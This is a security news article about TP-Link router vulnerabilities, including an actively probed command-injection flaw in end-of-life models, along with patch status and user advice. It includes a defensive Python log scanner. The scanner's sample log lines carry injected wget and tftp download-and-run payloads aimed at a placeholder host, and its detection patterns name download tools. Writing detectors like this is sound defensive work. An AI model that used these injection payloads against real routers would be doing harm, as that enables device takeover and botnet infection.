TP-Link routers had a big security hole that let hackers sneak in without a password. They fixed it, but older models are still at risk. It's like having a door that was left unlocked; you need to lock it up and change the locks to keep safe!
The Flaw
TP-Link has recently released patches for several vulnerabilities in its Archer NX router series, most notably a critical flaw tracked as CVE-2025-15517. This vulnerability allows attackers to bypass authentication checks, enabling them to perform privileged actions without needing to log in. Specifically, the flaw arises from a missing authentication check in the HTTP server for certain CGI endpoints, which were intended for authenticated users only. This oversight can lead to unauthorized firmware uploads and configuration changes, putting users at significant risk.
In addition to this critical flaw, TP-Link addressed other vulnerabilities, including a hardcoded cryptographic key issue (CVE-2025-15605) and two command injection vulnerabilities (CVE-2025-15518 and CVE-2025-15519). These issues could allow authenticated attackers to decrypt configuration files and execute arbitrary commands, further compromising the security of the devices.
Newly discovered vulnerabilities have also been identified in the TP-Link Archer AX53 v1.0 model, which is widely used internationally. These include two high-severity OS command injection flaws (CVE-2026-30815 and CVE-2026-30818) that allow attackers on the same network to execute system commands and potentially take full control of the device. Additionally, a stack-based buffer overflow vulnerability (CVE-2026-30814) can cause system crashes and provide a pathway for arbitrary code execution. Other vulnerabilities (CVE-2026-30816 and CVE-2026-30817) expose sensitive configuration files, which could be exploited for further attacks.
Active Exploitation of Older Models
Recent reports have highlighted that several end-of-life TP-Link Wi-Fi router models, including the TL-WR940N, TL-WR740N, and TL-WR841N, are actively being targeted by hackers attempting to exploit a vulnerability tracked as CVE-2023-33538. This command injection vulnerability, which has a CVSS score of 8.8, allows attackers to inject commands through a poorly secured HTTP GET request parameter, enabling them to execute arbitrary commands on the router without proper authentication. Despite over a year of exploitation attempts, no successful exploitation has been reported.
Telemetry data from Palo Alto Networks indicates that large-scale automated scans and probes have been detected since June 2025, coinciding with the vulnerability's addition to the Cybersecurity and Infrastructure Security Agency's (CISA) Known Exploited Vulnerabilities (KEV) Catalog. The observed payloads resemble malware commonly associated with Mirai-style botnets, indicating attempts to download and run harmful software on the routers. Researchers noted that access credentials for the router's web management interface are required to successfully exploit the flaw, emphasizing the need for users to avoid using default login credentials. Although the exploit attempts observed were flawed, they confirm the underlying vulnerability's existence and potential for exploitation.
Palo Alto Networks' analysis revealed that the exploitation attempts were largely ineffective due to several factors, including the attackers targeting the wrong parameter and relying on outdated utilities not present in the router's limited BusyBox environment. This demonstrates a gap between the theoretical vulnerability and its practical exploitation, with the attackers' methods failing to compromise the router environment effectively.
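The probe pattern described above (shell metacharacters smuggled into a GET parameter, followed by a Mirai-style download-and-run stage) can be picked out of router or gateway access logs. The following is an added example, not code from the article or from Palo Alto Networks; the endpoint path, parameter name, addresses and log lines are constructed placeholders rather than the real vulnerable endpoint, and the log format is the common Apache-style layout.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed sample access-log lines (not real telemetry): one normal page
# load, two probes carrying injection payloads in a query value, one login.
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Jun/2025:09:14:02 +0000] "GET /cgi-bin/status?page=1 HTTP/1.1" 200 2310',
    '198.51.100.7 - - [12/Jun/2025:09:14:05 +0000] "GET /cgi-bin/status?page=1;wget%20http://198.51.100.99/bot.sh%20-O%20/tmp/b.sh HTTP/1.1" 401 0',
    '198.51.100.7 - - [12/Jun/2025:09:14:06 +0000] "GET /cgi-bin/status?page=1|tftp%20-g%20198.51.100.99 HTTP/1.1" 401 0',
    '192.0.2.10 - - [12/Jun/2025:09:15:00 +0000] "POST /cgi-bin/login HTTP/1.1" 200 120',
]

# Apache/combined-style request line: client, timestamp, method, target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# Shell separators that never belong in a router-UI query value.
SHELL_META = re.compile(r'[;|`]|\$\(|&&|\|\|')
# Fetch/exec utilities typical of the download-and-run stage of bot payloads.
DOWNLOAD_TOOLS = re.compile(r'\b(wget|curl|tftp|ftpget|busybox|chmod)\b', re.I)

def query_params(query):
    """Split a raw query string on '&' and percent-decode each pair, so an
    encoded ';' (%3B) is inspected in its decoded form."""
    for pair in query.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            yield unquote_plus(name), unquote_plus(value)

def inspect_request(line):
    """Return a finding for a GET whose parameters look like command
    injection, or None for a benign or non-GET line."""
    m = LOG_RE.match(line)
    if not m or m.group("method") != "GET":
        return None
    parts = urlsplit(m.group("target"))
    hits = []
    for name, value in query_params(parts.query):
        reasons = [label for label, rx in (("shell-metachar", SHELL_META),
                                           ("download-tool", DOWNLOAD_TOOLS))
                   if rx.search(value)]
        if reasons:
            hits.append({"param": name, "reasons": reasons})
    if not hits:
        return None
    return {"src": m.group("ip"), "path": parts.path,
            "status": m.group("status"), "params": hits}

def scan_log(lines):
    """Run inspect_request over every line and keep the findings."""
    return [f for f in map(inspect_request, lines) if f]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The 401 status on the flagged lines matches the article's point that the exploit still needs valid web-interface credentials; a flagged request with a 200 status is the case that warrants immediate investigation.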
Evolving Threat Landscape
Security experts are warning that the threat landscape surrounding these vulnerabilities is evolving. Attackers are increasingly employing sophisticated techniques, such as leveraging multi-stage exploits and automated tools to bypass security measures. This trend underscores the importance of maintaining updated firmware and vigilant monitoring of network activity.
What's at Risk
The affected devices include the Archer NX200, NX210, NX500, NX600, and the Archer AX53 v1.0 models, as well as older models like the TL-WR940N, TL-WR740N, and TL-WR841N. With millions of these routers in use, the potential impact is substantial. If exploited, attackers could gain full control over the router, leading to data breaches, unauthorized access to personal information, and manipulation of network traffic. This could also facilitate further attacks on connected devices within the home or business network.
TP-Link has strongly recommended that users update to the latest firmware version to mitigate these risks. Failure to do so could leave devices vulnerable to exploitation, and the company has stated that it cannot be held responsible for any consequences resulting from unpatched devices.
Patch Status
TP-Link has acted quickly to address these vulnerabilities, releasing security updates shortly after the flaws were discovered. Users are encouraged to check their router settings and ensure they have installed the latest firmware updates. The company has emphasized the importance of taking these actions to protect against potential attacks that could exploit these vulnerabilities. However, for the older models affected by CVE-2023-33538, TP-Link has confirmed that no further patches will be provided as these devices are considered end-of-life.
Immediate Actions
To protect yourself and your network, follow these steps:
- Update your router firmware immediately to the latest version provided by TP-Link.
- Review your router settings to ensure no unauthorized changes have been made.
- Monitor your network traffic for any unusual activity that could indicate a breach.
- Consider changing your router's default credentials to strengthen security.
- Replace any end-of-life TP-Link models with currently supported hardware to avoid security risks.
By taking these precautions, users can significantly reduce the risk of falling victim to attacks exploiting these critical vulnerabilities.
As the threat landscape evolves, it's crucial for users to stay informed about vulnerabilities and ensure their devices are regularly updated. The rise in sophisticated attack methods highlights the need for proactive security measures.